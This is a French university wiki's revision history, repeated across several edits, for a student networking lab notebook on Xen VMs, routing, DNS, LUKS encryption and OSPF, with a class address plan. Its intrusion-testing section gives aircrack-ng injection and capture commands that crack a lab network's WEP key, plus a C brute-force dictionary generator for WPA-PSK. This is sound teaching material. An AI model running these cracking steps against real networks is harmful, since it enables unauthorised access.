Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===
=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

== Site Web ==

Achat de clavaire.site[http://clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

TP sysres IMA5sc 2020/2021 G3

2020-11-16T14:48:01Z

Tmertz : /* SSH */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.178/28
URL : clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

//rename disque et formatage (lvrename/mkfs)

//modif .cfg pour ajouter disques

//transfert fichier /var vers nouvelle partition

//ajoute au /etc/fstab les disques

//mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30
2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0
3. enable
4. conf t
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26
6. exit
7. write

== Services Internet ==
=== SSH ===
modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc :
ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186

- relancer bind :
service bind9 restart

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===
=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

== Site Web ==

Achat de clavaire.site[http://clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

TP sysres IMA5sc 2020/2021 G3

2020-11-16T14:42:59Z

Tmertz : /* Routage du site IPv4 */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.178/28
URL : clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

//rename disque et formatage (lvrename/mkfs)

//modif .cfg pour ajouter disques

//transfert fichier /var vers nouvelle partition

//ajoute au /etc/fstab les disques

//mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30
2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0
3. enable
4. conf t
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26
6. exit
7. write

== Services Internet ==
=== SSH ===
accès ssh ok (modif /etc/ssh/sshd_config)

ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186

- relancer bind :
service bind9 restart

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===
=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

== Site Web ==

Achat de clavaire.site[http://clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

TP sysres IMA5sc 2020/2021 G3

2020-11-02T15:38:03Z

Tmertz : /* Cassage de mot de passe WPA-PSK par force brute */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.178/28
URL : clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

//rename disque et formatage (lvrename/mkfs)

//modif .cfg pour ajouter disques

//transfert fichier /var vers nouvelle partition

//ajoute au /etc/fstab les disques

//mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09
2. minicom -> /dev/ttyACM0
3. enable
4. conf t
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26
6. exit
7. write

== Services Internet ==
=== SSH ===
accès ssh ok (modif /etc/ssh/sshd_config)

ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186

- relancer bind :
service bind9 restart

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===
=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Chiffrement de données ===

== Site Web ==

Achat de clavaire.site[http://clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

TP sysres IMA5sc 2020/2021 G3

2020-11-02T15:37:19Z

Tmertz : /* Cassage de mot de passe WPA-PSK par force brute */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.178/28
URL : clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

//rename disque et formatage (lvrename/mkfs)

//modif .cfg pour ajouter disques

//transfert fichier /var vers nouvelle partition

//ajoute au /etc/fstab les disques

//mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09
2. minicom -> /dev/ttyACM0
3. enable
4. conf t
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26
6. exit
7. write

== Services Internet ==
=== SSH ===
accès ssh ok (modif /etc/ssh/sshd_config)

ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186

- relancer bind :
service bind9 restart

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===
=== Intrusion sur un serveur d’application Web ===

== Site Web ==

Achat de clavaire.site[http://clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

TP sysres IMA5sc 2020/2021 G3

2020-11-02T14:11:43Z

Tmertz : /* Services Internet */

TP sysres IMA5sc 2020/2021 G3

2020-11-02T14:08:44Z

Tmertz : /* Installation VirtualMachine */

TP sysres IMA5sc 2020/2021 G3

2020-11-02T13:50:21Z

Tmertz : /* Installation VirtualMachine */

TP sysres IMA5sc 2020/2021 G3

2020-11-02T13:49:40Z

Tmertz : /* Installation VirtualMachine */

TP sysres IMA5sc 2020/2021

2020-11-02T10:01:02Z

Tmertz : /* Plan d'adressage */

== Répartition des binômes ==

{| class="wikitable"
! Cahier !! Elèves
|-
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]
| GURY Evan & DUBOIS Vincent
|-
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]
| BARGIBANT Quentin & LAGNEAU Alex
|-
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]
| SIMONIN Richard & MERTZ Thomas
|-
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]
| BENAYED Samuel & EVRARD Théo
|-
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]
| RINGOT Loïc & SANCHEZ Pierre
|-
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]
| NDUWAMUNGU Jean De Dieu & MOINAT Théau
|-
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]
| EKHLAS EID Nour & BISALLI Clara
|-
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]
| SOULAIMANI Jawad & TEKIN Kadir
|-
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]
| VIEUBLED Tanguy & VERNIER Paul
|-
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]
| MALTI Hind & AHOUASSOU Loris
|-
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]
| DARDENNE Sébastien & CALLERISA Corto
|-
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]
| NORMAND Quentin & CLAUDEL Maxime
|-
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]
| NOM Prénom & NOM Prénom
|-
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]
| FAUCHOIS Lukas & ROUILLÉ Guillaume
|}

==Plan d'adressage==

{| class="wikitable"
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)
|-
| Groupe 14
| oronge.site
| Debian 10 Buster
| 314
| 100.64.0.16
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.176
|-
| Groupe 12
|
|
| 312
| 100.64.0.17
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.177
|-
| Groupe 11
|
|
| 311
| 100.64.0.18
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.178
|-
| Groupe 10
|
|
| 310
| 100.64.0.19
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.179
|-
| Groupe 9
|
|
| 309
| 100.64.0.20
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.180
|-
| Groupe 8
|
|
| 308
| 100.64.0.21
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.181
|-
| Groupe 7
|
|
| 307
| 100.64.0.22
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.182
|-
| Groupe 6
|
|
| 306
| 100.64.0.23
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.183
|-
| Groupe 5
|
|
| 305
| 100.64.0.24
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.184
|-
| Groupe 4
|
|
| 304
| 100.64.0.25
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.185
|-
| Groupe 3
| clavaire.site
| Debian 10 Buster
| 303
| 100.64.0.26
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.186
|-
| Groupe 2
|
|
| 302
| 100.64.0.27
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.187
|-
| Groupe 1
| trompettedelamort.site
| Debian 10 Buster
| 301
| 100.64.0.28
| 255.255.255.0
| 100.64.0.254
| 100.64.0.1
| 100.64.0.2
| 193.48.57.188
|}

== Installation du réseau ==

=== Branchement du matériel ===

[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]

=== Connexions entre équipements ===

{| class="wikitable"
! !! Type !! Port
|-
| 6509-E
| Fibre 10G
| Te5/4
|-
| 9200
| Fibre 10G
| Te1/1/1
|}
{| class="wikitable"
! !! Type !! Port
|-
| 6509-E
| Fibre 10G
| Te6/5
|-
| ISR 4331
| Fibre 10G
| AAA
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 6509-E
| Fibre 10G
| Te5/5
| 333
| 100.64.0.1/24
|-
| CAPBRETON
| Fibre 10G
| Eth5
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 6509-E
| Fibre 10G
| Te6/4
| 131
| 192.168.222.12/29
|-
| ECOLE
| Fibre 10G
| N/A
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 9200
| Fibre 1G
| Te1/1/3
| 333
| 100.64.0.2/24
|-
| CAPBRETON
| Cuivre
| Eth4
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port
|-
| 9200
| Cuivre
| Te5/4
|-
| ISR 4331
| Cuivre
| AAA
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| 9200
| Fibre 10G
| Gi1/0/1
| 131
| 192.168.222.13/29
|-
| ECOLE
| Fibre 10G
| N/A
| N/A
| N/A
|}
{| class="wikitable"
! !! Type !! Port !! VLAN !! IP
|-
| ISR 4331
| Cuivre
| Gi1/0/2
| XXX
| YYY.YYY.YYY.YYY
|-
| SDSL
| Cuivre
| N/A
| N/A
| N/A
|}

=== Paramétrage de l'OSPF ===

'''6509-E'''

router ospf 1 # un numéro de processus
router-id 10.60.0.1 # un id pour le routeur (plus petite adresse disponible)
log-adjacency-changes
summary-address 193.48.57.176 255.255.255.240 # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)
summary-address 100.64.0.0 255.240.0.0 not-advertise # address q'on veut pas diffuser (celle du reseau privé)
summary-address 10.0.0.0 255.0.0.0 not-advertise # address q'on veut pas diffuser (?)
redistribute connected subnets # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés
redistribute static subnets route-map ospf
network 192.168.222.8 0.0.0.7 area 2 # domaine de diffusion OSPF

'''9200'''

router ospf 1
router-id 10.60.0.2 # on change simplement l'id du routeur par rapport au 6509-E
log-adjacency-changes
summary-address 193.48.57.176 255.255.255.240
summary-address 100.64.0.0 255.240.0.0 not-advertise
summary-address 10.0.0.0 255.0.0.0 not-advertise
redistribute connected subnets
redistribute static subnets route-map ospf
network 192.168.222.8 0.0.0.7 area 2

=== Paramétrage NAT ===

L'objectif du NAT est de faire la translation ip_privee<->ip_publique entre les VM et l'extérieur

'''6509-E'''

[A COMPLETER]

enable
configure terminal
ip nat inside source static local-ip global-ip
interface type number
ip address ip-address mask [secondary]
ip nat inside
exit
interface type number
ip address ip-address mask [secondary]
ip nat outside
end

'''9200'''

TP sysres IMA5sc 2020/2021 G3

2020-11-02T07:42:55Z

Tmertz : /* Installation VirtualMachine */

TP sysres IMA5sc 2020/2021 G3

2020-10-15T09:56:30Z

Tmertz : /* Cassage de clef WEP d’un point d’accès WiFi */

TP sysres IMA5sc 2020/2021 G3

2020-10-15T09:55:36Z

